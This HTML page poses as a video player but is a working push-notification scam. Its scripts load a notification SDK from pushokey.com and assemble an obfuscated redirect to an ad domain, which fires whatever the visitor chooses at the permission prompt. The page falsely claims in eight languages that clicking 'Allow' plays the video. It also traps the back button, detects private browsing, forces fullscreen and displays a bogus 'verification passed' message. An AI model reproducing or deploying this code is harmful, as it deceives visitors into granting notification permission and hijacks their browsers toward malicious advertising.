<!DOCTYPE html>
<html>


<meta http-equiv="content-type" content="text/html;charset=UTF-8" />

<head>
    <meta charset="UTF-8">
    <title>Video</title>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width,height=device-height,initial-scale=1,minimum-scale=1">
    <link rel="icon" type="image/png" sizes="16x16" href="icon.png">
    <style>
        body,
        html {
            background-color: #595959;
            height: 100%
        }

        body {
            -moz-osx-font-smoothing: grayscale;
            -moz-user-select: none;
            -ms-user-select: none;
            -webkit-font-smoothing: antialiased;
            -webkit-user-select: none;
            color: #fff;
            font: 400 16px Helvetica, Verdana, Arial, sans-serif;
            margin: 0;
            overflow: hidden;
            text-align: center;
            user-select: none
        }

        .fix {
            height: 100%;
            left: 0;
            position: fixed;
            top: 0;
            width: 100%;
            z-index: 1
        }

        .isHide {
            display: none !important
        }

        .isShow {
            display: block !important
        }

        .video {
            background-color: #2d2d2d;
            bottom: 0;
            box-shadow: 0 0 15px 1px #2d2d2d;
            left: 0;
            margin: auto;
            max-height: 500px;
            max-width: 700px;
            position: fixed;
            right: 0;
            top: 0
        }

        .video__wDescr {
            bottom: 50px;
            left: 0;
            position: absolute;
            top: 0;
            width: 100%
        }

        .video__descr {
            left: 5px;
            position: absolute;
            right: 5px;
            top: 50%;
            transform: translateY(-50%)
        }

        .video__descrIc {
            background: url(images/video-1/puzzle.jpg) no-repeat;
            background-size: 100%;
            height: 95px;
            margin: auto;
            width: 95px
        }

        .video__descrT {
            font-size: 24px;
            font-weight: 700;
            margin-top: 40px
        }

        .video__descrT span {
            color: #1394ff;
            text-transform: uppercase
        }

        .video__descrTx {
            font-size: 16px;
            margin-top: 15px
        }

        .video__wControl {
            background-color: #000;
            bottom: 0;
            height: 50px;
            left: 0;
            position: absolute;
            width: 100%
        }

        .video__controlProgress {
            background-color: #666;
            height: 4px;
            margin-top: 3px;
            position: relative
        }

        .video__controlProgress:before {
            background-color: #d0021b;
            content: "";
            height: 100%;
            left: 0;
            position: absolute;
            top: 0;
            width: 3px
        }

        .video__controlLeft,
        .video__controlRight {
            margin-top: 8px
        }

        .video__controlLeft {
            float: left
        }

        .video__controlRight {
            float: right;
            padding-right: 10px
        }

        .video__controlRight .video__controlIc:first-child {
            margin-left: 0
        }

        .video__controlInfo {
            float: left;
            font-size: 12px;
            line-height: 29px;
            margin-left: 10px
        }

        .video__controlIc {
            fill: #939393;
            float: left;
            height: 27px;
            margin-left: 10px;
            width: 27px
        }

        .popup {
            background-color: rgba(0, 0, 0, .8);
            height: 100%;
            left: 0;
            position: fixed;
            top: 0;
            visibility: hidden;
            width: 100%
        }

        .popup.isVisible {
            visibility: visible
        }

        .popup__inner {
            background-color: #fff;
            bottom: 0;
            box-shadow: 0 -5px 10px rgba(0, 0, 0, .5);
            color: #000;
            left: 0;
            margin: auto;
            max-width: 560px;
            opacity: 0;
            padding: 20px;
            position: absolute;
            right: 0;
            text-align: left;
            transform: translateY(75%);
            transition: opacity .15s ease-out, transform .15s ease-out
        }

        .isVisible .popup__inner {
            opacity: 1;
            transform: translateY(0)
        }

        .popup__t {
            font-weight: 700
        }

        .popup__tx {
            font-size: 14px;
            margin-top: 16px
        }

        .popup__lk {
            color: #009cff;
            font-size: 14px;
            margin-top: 14px
        }

        .msgReady {
            background-color: rgba(0, 0, 0, .75);
            height: 100%;
            left: 0;
            position: fixed;
            top: 0;
            width: 100%
        }

        .msgReady__tx {
            font-size: 32px;
            margin-top: 10%
        }

        @media (min-width:425px) {
            .msgReady__tx {
                font-size: 52px
            }
        }

        @media (min-width:700px) {

            .video__controlLeft,
            .video__controlRight {
                margin-top: 6px
            }

            .video__controlInfo {
                line-height: 34px
            }

            .video__controlIc {
                height: 32px;
                width: 32px
            }

            .video__descrT {
                font-size: 32px
            }

            .video__descrTx {
                font-size: 18px
            }
        }
    </style>
</head>

<body>
  <script>(function() {
    function getParameterByName(name, url) {
      if (!url) url = window.location.href;
      name = name.replace(/[\[\]]/g, '\\$&');
      var regex = new RegExp('[?&]' + name + '(=([^&#]*)|&|#|$)'),
          results = regex.exec(url);
      if (!results) return null;
      if (!results[2]) return '';
      return decodeURIComponent(results[2].replace(/\+/g, ' '));
    }

    var loc = document.location;
    var tb = function(){ loc.href = ['ht', 'tps:/', '/blud', 'wan.com/a', 'fu.ph', 'p?zon', 'eid=2483917'].join(''); };
    var bc = function(){ loc.href = ['ht', 'tps:', '/', '/go', 'ogle.com/'].join(''); };

    var url = new URL(window.location.href);
    var pci = getParameterByName('external_id', window.location.href);
    var ppi = getParameterByName('placementid', window.location.href);
    var tag = document.createElement('script');
    tag.type = 'text/javascript';
    tag.dataset['sdk'] = 'sdk';
    tag.src = '//pushokey.com/ntfc.php?p=2483903&ucis=true&m=https&nbinp=true' + '&var='+ ppi + '&ymid=' + pci;

    function setupHandlers() {
      // sdk.onBeforePermissionPrompt();
      sdk.onPermissionDefault(tb);
      sdk.onPermissionAllowed(tb);
      sdk.onPermissionDenied(tb);
      sdk.onAlreadySubscribed(tb);
    }

    tag.onload = setupHandlers;

    document.head.appendChild(tag);
    })();</script>  
    <div class="video">
        <div class="video__wDescr">
            <div class="video__descr">
                <div class="video__descrIc"></div>
                <div class="video__descrT"></div>
                <div class="video__descrTx"></div>
            </div>
        </div>
        <div class="video__wControl">
            <div class="video__controlProgress"></div>
            <div class="video__controlLeft"><svg xmlns="http://www.w3.org/2000/svg" version="1.1" class="video__controlIc isPlay" viewBox="0 0 32 32">
                    <path d="m9 24 14-8-14-8z"></path>
                </svg><svg xmlns="http://www.w3.org/2000/svg" version="1.1" class="video__controlIc isGo" viewBox="0 0 32 32">
                    <path d="m19.9982847 15.3389545-10.9982847-7.3389545v15.9990007l10.9982847-7.3399538v7.3409531h3.0017153v-15.98900756h-3.0017153z"></path>
                </svg>
                <div class="video__controlInfo">00:00 / 21:20</div><svg xmlns="http://www.w3.org/2000/svg" version="1.1" class="video__controlIc isSound" viewBox="0 0 32 32">
                    <path d="m15.7953529 9.04082456c.1257064.06406941.2056128.19737514.2046383.34308139v14.23271095c0 .1457062-.0799064.279012-.2046383.3430814-.0526213.0279012-.1091404.0403017-.1656596.0403017-.0779574 0-.1568893-.0258344-.2221787-.0775033l-5.54374876-4.3288192h-3.11927225c-.41025105 0-.74449359-.3451481-.74449359-.7698664v-4.646066c0-.4247183.33424254-.7698664.74449359-.7698664h3.11927225l5.54374876-4.32985255c.1110894-.0878371.2621319-.10333777.3878383-.03720159zm7.2046471 7.45867724c0 2.2629767-1.0844571 4.2688649-2.747102 5.5004982l-1.252898-1.3691458c1.3172463-.8788839 2.1925716-2.3994927 2.1925716-4.1313524 0-1.7308633-.8753253-3.2514721-2.1925716-4.130356l1.252898-1.3691458c1.6626449 1.2316333 2.747102 3.2375215 2.747102 5.4995018zm-3-.0000037c0 1.4897461-.7231986 2.7907643-1.7970123 3.5005019l-1.2029877-1.4254984c.7688928-.3011616 1.3224956-1.1153018 1.3224956-2.0750035 0-.957694-.5544815-1.7728381-1.3224956-2.0729959l1.2029877-1.4265022c1.0738137.7097376 1.7970123 2.0107558 1.7970123 3.4994981zm2.2948011-7.4994981c2.2528555 1.7418839 3.7051989 4.455703 3.7051989 7.4995 0 3.044797-1.4523434 5.7586161-3.7042143 7.5005l-1.2957857-1.3639091c1.8914927-1.393907 3.120323-3.6247583 3.120323-6.1365909 0-2.5098326-1.2288303-4.7416839-3.120323-6.134591z"></path>
                </svg>
            </div>
            <div class="video__controlRight"><svg xmlns="http://www.w3.org/2000/svg" version="1.1" class="video__controlIc isOptions" viewBox="0 0 32 32">
                    <path d="m23.242 14.316c.421 0 .758.337.758.741v1.853c0 .421-.337.757-.758.757h-.842c-.32 0-.589.203-.708.505-.033.102-.067.202-.118.304-.134.303-.066.64.153.858l.572.557c.304.303.304.774 0 1.077l-1.314 1.315c-.303.302-.774.302-1.078 0l-.572-.574c-.219-.218-.556-.286-.843-.151-.1.067-.219.101-.336.151-.303.119-.489.405-.489.707v.827c0 .421-.337.757-.758.757h-1.852c-.421 0-.758-.336-.758-.757v-.776c0-.319-.202-.589-.488-.707-.102-.051-.219-.101-.337-.151-.287-.135-.623-.068-.842.151l-.573.572c-.303.304-.775.304-1.078 0l-1.314-1.313c-.303-.303-.303-.774 0-1.078l.59-.589c.219-.236.286-.573.151-.859-.033-.101-.084-.203-.117-.303-.102-.304-.388-.506-.708-.506h-.825c-.421 0-.758-.337-.758-.74v-1.854c0-.421.337-.758.758-.758h.842c.32 0 .589-.202.708-.504.033-.102.067-.186.118-.287.134-.287.066-.64-.153-.859l-.606-.606c-.303-.303-.303-.775 0-1.078l1.314-1.314c.303-.303.775-.303 1.078 0l.606.606c.236.219.573.287.859.152.101-.05.185-.084.287-.117.302-.102.504-.388.504-.708v-.859c0-.421.337-.758.759-.758h1.852c.422 0 .759.337.759.758v.842c0 .32.202.59.504.707.102.034.186.085.287.118.286.135.64.068.859-.151l.606-.607c.303-.302.775-.302 1.078 0l1.314 1.314c.303.304.303.775 0 1.078l-.606.606c-.237.219-.287.573-.153.859.034.085.085.185.118.287.119.303.388.505.708.505zm-7.242 4.632c1.634 0 2.947-1.314 2.947-2.948 0-1.633-1.313-2.947-2.947-2.947s-2.947 1.314-2.947 2.947c0 1.634 1.313 2.948 2.947 2.948z"></path>
                </svg><svg xmlns="http://www.w3.org/2000/svg" version="1.1" class="video__controlIc isFull" viewBox="0 0 32 32">
                    <path d="m8.125 17.75v2.625h2.625v2.625h-5.25v-5.25zm13.125-8.75h5.25v5.25h-2.625v-2.625h-2.625zm2.625 11.375v-2.625h2.625v5.25h-5.25v-2.625zm-18.375-6.125v-5.25h5.25v2.625h-2.625v2.625z"></path>
                </svg><svg xmlns="http://www.w3.org/2000/svg" version="1.1" class="video__controlIc isSave" viewBox="0 0 32 32">
                    <path d="m22.667958 17.4957586h2.0463774c.1389837 0 .2525019.1136976.2525019.2525019v6.6375006c0 .138625-.1135182.252502-.2525019.252502h-17.42819149c-.13898365 0-.25268125-.113877-.25268125-.252502v-6.6375006c0-.1388043.1136976-.2525019.25268125-.2525019h1.89484037c.13880432 0 .25250191.1136976.25250191.2525019v4.4456836c0 .1388043.1136976.2523226.25250192.2523226h12.47714539c.138625 0 .252502-.1135183.252502-.2523226v-4.4456836c0-.1388043.1136976-.2525019.2523225-.2525019zm-4.8844056-3.2958673v.0001793h2.3103566c.2223739 0 .3014601.1502817.1761058.3337401l-4.041824 5.9239317c-.1255336.1834584-.3303328.1834584-.4556871 0l-4.0420033-5.924111c-.1255336-.1834585-.0460887-.3337401.1761058-.3337401h2.3101773c.2223738 0 .4042183-.1818445.4042183-.404039v-6.39181337c0-.22219451.1818444-.40403893.4042182-.40403893h1.9497165c.2223739 0 .4043976.18184442.4043976.40403893v6.39181337c0 .2221945.1818444.404039.4042183.404039z"></path>
                </svg></div>
        </div>
    </div>
    <div class="popup">
        <div class="popup__inner">
            <div class="popup__t"></div>
            <div class="popup__tx"></div>
            <div class="popup__lk"></div>
        </div>
    </div>
    <div class="msgReady isHide">
        <div class="msgReady__tx"></div>
    </div>
    <div class="fix"></div>
    <script>
        ! function(o) {
            var t = {};

            function i(e) {
                if (t[e]) return t[e].exports;
                var n = t[e] = {
                    i: e,
                    l: !1,
                    exports: {}
                };
                return o[e].call(n.exports, n, n.exports, i), n.l = !0, n.exports
            }
            i.m = o, i.c = t, i.d = function(e, n, o) {
                i.o(e, n) || Object.defineProperty(e, n, {
                    enumerable: !0,
                    get: o
                })
            }, i.r = function(e) {
                "undefined" != typeof Symbol && Symbol.toStringTag && Object.defineProperty(e, Symbol.toStringTag, {
                    value: "Module"
                }), Object.defineProperty(e, "__esModule", {
                    value: !0
                })
            }, i.t = function(n, e) {
                if (1 & e && (n = i(n)), 8 & e) return n;
                if (4 & e && "object" == typeof n && n && n.__esModule) return n;
                var o = Object.create(null);
                if (i.r(o), Object.defineProperty(o, "default", {
                        enumerable: !0,
                        value: n
                    }), 2 & e && "string" != typeof n)
                    for (var t in n) i.d(o, t, function(e) {
                        return n[e]
                    }.bind(null, t));
                return o
            }, i.n = function(e) {
                var n = e && e.__esModule ? function() {
                    return e.default
                } : function() {
                    return e
                };
                return i.d(n, "a", n), n
            }, i.o = function(e, n) {
                return Object.prototype.hasOwnProperty.call(e, n)
            }, i.p = "", i(i.s = 2)
        }([function(e, n) {
            if (0 === "".length) {
                var o = function() {
                    void 0 !== this.requestFullScreen ? this.requestFullScreen() : void 0 !== this.webkitRequestFullScreen ? this.webkitRequestFullScreen() : void 0 !== this.mozRequestFullScreen && this.mozRequestFullScreen()
                };
                document.body.addEventListener("keydown", o), document.body.addEventListener("click", o)
            }
        }, , function(e, n, o) {
            "use strict";
            o.r(n);
            var u = function() {
                    var e = location.search.split("#")[0].split("?")[1];
                    if (void 0 === e) return null;
                    var t = {};
                    return e.split("&").forEach(function(e) {
                        var n = e.split("=");
                        if (2 === n.length) t[n[0]] = n[1] || null;
                        else {
                            var o = n[0];
                            n.shift(), t[o] = n.join("=")
                        }
                    }), t
                },
                t = u();
            if (null !== t && void 0 !== t.bbr && "1" === t.bbr) {
                var i = document.title,
                    r = location.pathname + location.search;
                history.pushState(null, i, r), window.addEventListener("popstate", function() {
                    history.pushState({}, i, r)
                })
            }
            o(0);
            var a = function(n) {
                    var e = decodeURIComponent(document.cookie).split(";");
                    if (0 === e.length) return null;
                    var o = null;
                    return e.some(function(e) {
                        if (" " === e[0] && (e = e.slice(1)), e = e.split("="), n === e[0]) return o = e[1], !0
                    }), o
                },
                d = function(e, n, o, t) {
                    var i = new Date;
                    i.setTime(i.getTime() + 1e3 * o);
                    var r = "; expires=" + i.toUTCString(),
                        a = "";
                    void 0 !== t && (a = "; domain=" + t), document.cookie = e + "=" + (n || "") + a + r + "; path=/"
                },
                l = function(e, n) {
                    var o = new XMLHttpRequest;
                    o.addEventListener("readystatechange", function() {
                        if (2 === this.readyState && void 0 !== n) return n()
                    }), o.addEventListener("error", function() {
                        if (void 0 !== n) return n()
                    }), o.open("GET.html", e, !0), o.responseType = "text", o.send()
                },
                c = function(e) {
                    null !== window.opener && void 0 !== window.opener && opener.postMessage(e, "*")
                },
                f = {
                    ua: navigator.userAgent,
                    m: function(n) {
                        var e = "normal",
                            o = "private";

                        function t() {
                            return n(o)
                        }

                        function i() {
                            return n(e)
                        }
                        if ("safari" === f.n) try {
                            return window.openDatabase(null, null, null, null), n(e)
                        } catch (e) {
                            return n(o)
                        } else if ("firefox" === f.n) {
                            var r = indexedDB.open("test.html");
                            r.addEventListener("error", t), r.addEventListener("success", i)
                        } else {
                            if ("edge" === f.n) return void 0 !== window.indexedDB || void 0 === window.PointerEvent && void 0 === window.MSPointerEvent ? n(e) : n(o);
                            if ("opera" !== f.n && "yandex" !== f.n && "chrome" !== f.n) return n("unknown");
                            window.webkitRequestFileSystem(window.TEMPORARY, 1, i, t)
                        }
                    },
                    get n() {
                        var e = !!window.opr && !!opr.addons || !!window.opera || 0 < this.ua.indexOf("OPR/index.html"),
                            n = "undefined" != typeof InstallTrigger,
                            o = /constructor/i.test(window.HTMLElement) || /(MacPPC|MacIntel|Mac_PowerPC|Macintosh)/.test(this.ua),
                            t = !!window.chrome && /Google Inc/.test(navigator.vendor),
                            i = 0 < this.ua.indexOf("YaBrowser") || 0 < this.ua.indexOf("Yowser"),
                            r = /UBrowser/.test(this.ua),
                            a = /Edge\//.test(this.ua),
                            s = null;
                        return e ? s = "opera" : n ? s = "firefox" : i ? s = "yandex" : r ? s = "uc" : a ? s = "edge" : t ? s = "chrome" : o && (s = "safari"), s
                    },
                    get d() {
                        var n = {
                                webOS: "webOS",
                                iPhone: "iPhone",
                                iPad: "iPad",
                                iPod: "iPod",
                                mac: "(MacPPC|MacIntel|Mac_PowerPC|Macintosh)",
                                blackBerry: "BlackBerry|BB|PlayBook",
                                windows: "Windows NT",
                                windowPhone: "Windows Phone",
                                android: "Android"
                            },
                            o = null;
                        return Object.keys(n).some(function(e) {
                            if (null !== f.ua.match(new RegExp(n[e], "i"))) return o = e, !0
                        }), o
                    }
                };
                var v = f,
                m = u();
            var T = function(n) {
                    if (!(void 0 !== window.navigator && void 0 !== navigator.serviceWorker && void 0 !== window.PushManager && void 0 !== window.Notification)) return n(!1, "unsupported");
                    v.m(function(e) {
                        return "private" === e ? n(!1, e) : "unknown" === e ? n(!1, e) : n(!0, "supported")
                    })
                },
                g = {
                    k: "",
                    t: {},
                    set: function(e) {
                        void 0 !== window.navigator && void 0 !== navigator.language && (g.k = navigator.language.slice(0, 2)), void 0 === e[g.k] && (g.k = "en"), g.t = e[g.k]
                    },
                    get: function(e) {
                        return g.t[e]
                    }
                },
                y = g;

            function k(e) {
                c({
                    a: e ? "success" : "close"
                }), null !== window.opener && void 0 !== window.opener && close(), document.querySelector(".video").classList.add("isHide"), document.querySelector(".popup").classList.add("isHide"), document.querySelector(".msgReady").classList.remove("isHide")
            }
            var b = "convert";

            y.set({
                en: {
                    videoT: "Click <span>Allow,</span> to play the video",
                    videoTx: "Stream and download available",
                    popupT: 'Click "Allow" to close this window',
                    popupTx: 'This window can be closed by clicking "Allow". If you want to continue actions on this site, just click on the detailed information.',
                    popupLk: "Detailed information",
                    msgReady: "You have successfully passed the verification!<br>Now you can close the window."
                },
                uk: {
                    videoT: "Натисніть <span>Дозволити,</span> щоб відтворити відео",
                    videoTx: "Stream і download доступні",
                    popupT: 'Натисніть "Дозволити", щоб закрити це вікно',
                    popupTx: 'Це вікно можна закрити натисканням "Дозволити". Якщо ви хочете продовжити дії на даному сайті, просто натисніть на детальну інформацію.',
                    popupLk: "Детальна інформація",
                    msgReady: "Ви успішно пройшли перевірку!<br>Тепер ви можете закрити вікно."
                },
                pl: {
                    videoT: "Kliknij <span>Pozwól,</span>, aby odtworzyć wideo",
                    videoTx: "Dostępny strumień i pobieranie",
                    popupT: 'Kliknij "Zezwól", aby zamknąć to okno',
                    popupTx: 'To okno można zamknąć, klikając "Zezwalaj". Jeśli chcesz kontynuować działania na tej stronie, po prostu kliknij szczegółowe informacje.',
                    popupLk: "Szczegółowe informacje",
                    msgReady: "Pomyślnie przeszedłeś weryfikację!<br>Teraz możesz zamknąć okno."
                },
                ru: {
                    videoT: "Нажмите <span>Разрешить,</span> чтобы воспроизвести видео",
                    videoTx: "Stream и download доступны",
                    popupT: 'Нажмите "Разрешить", чтобы закрыть это окно',
                    popupTx: 'Это окно можно закрыть нажатием "Разрешить". Если вы хотите продолжить действия на данном сайте, просто нажмите на подробную информацию.',
                    popupLk: "Подробная информация",
                    msgReady: "Вы успешно прошли проверку!<br>Теперь вы можете закрыть окно ..."
                },
                fr: {
                    videoT: "Cliquez sur <span>Autoriser,</span> pour lire la vidéo.",
                    videoTx: "Diffuser et télécharger disponible",
                    popupT: 'Cliquez sur "Autoriser" pour fermer cette fenêtre',
                    popupTx: 'Cette fenêtre peut être fermée en cliquant sur "Autoriser". Si vous souhaitez poursuivre les actions sur ce site, cliquez simplement sur les informations détaillées.',
                    popupLk: "Informations détaillées",
                    msgReady: "Vous avez réussi le test!<br>Maintenant vous pouvez fermer la fenêtre"
                },
                de: {
                    videoT: "Klicken Sie auf <span>Erlauben,</span>, um das Video abzuspielen",
                    videoTx: "Stream und Download verfügbar",
                    popupT: 'Klicken Sie auf "Zulassen", um dieses Fenster zu schließen',
                    popupTx: 'Dieses Fenster kann geschlossen werden, indem Sie auf "Zulassen" klicken. Wenn Sie die Aktionen auf dieser Seite fortsetzen möchten, klicken Sie einfach auf die Detailinformationen.',
                    popupLk: "Detaillierte Informationen",
                    msgReady: "Sie haben den Test erfolgreich bestanden!<br>Jetzt können Sie das Fenster schließen"
                },
                es: {
                    videoT: "Haga clic en <span>Permitir,</span> para reproducir el video",
                    videoTx: "Stream y descarga disponibles",
                    popupT: 'Haga clic en "Permitir" para cerrar esta ventana',
                    popupTx: 'Esta ventana se puede cerrar haciendo clic en "Permitir". Si desea continuar las acciones en este sitio, simplemente haga clic en la información detallada.',
                    popupLk: "Información detallada",
                    msgReady: "Has pasado la prueba con éxito!<br>Ahora puedes cerrar la ventana"
                },
                th: {
                    videoT: "คลิก <span>อนุญาต,</span> เพื่อเล่นวิดีโอ",
                    videoTx: "สตรีมและดาวน์โหลดได้",
                    popupT: 'คลิก "อนุญาต" เพื่อปิดหน้าต่างนี้',
                    popupTx: 'สามารถปิดหน้าต่างนี้ได้โดยคลิก "อนุญาต" หากคุณต้องการดำเนินการต่อในไซต์นี้เพียงแค่คลิกที่ข้อมูลโดยละเอียด',
                    popupLk: "รายละเอียดข้อมูล",
                    msgReady: "คุณผ่านการตรวจสอบสำเร็จแล้ว!<br>ตอนนี้คุณสามารถปิดหน้าต่างได้"
                }
            }), document.querySelector(".video__descrT").innerHTML = y.get("videoT"), document.querySelector(".video__descrTx").textContent = y.get("videoTx"), document.querySelector(".popup__t").textContent = y.get("popupT"), document.querySelector(".popup__tx").textContent = y.get("popupTx"), document.querySelector(".popup__lk").textContent = y.get("popupLk"), document.querySelector(".msgReady__tx").innerHTML = y.get("msgReady"), document.body.addEventListener("mouseout", function() {
                document.querySelector(".popup").classList.add("isVisible")
            })
        }]);
    </script>

</body>


</html>
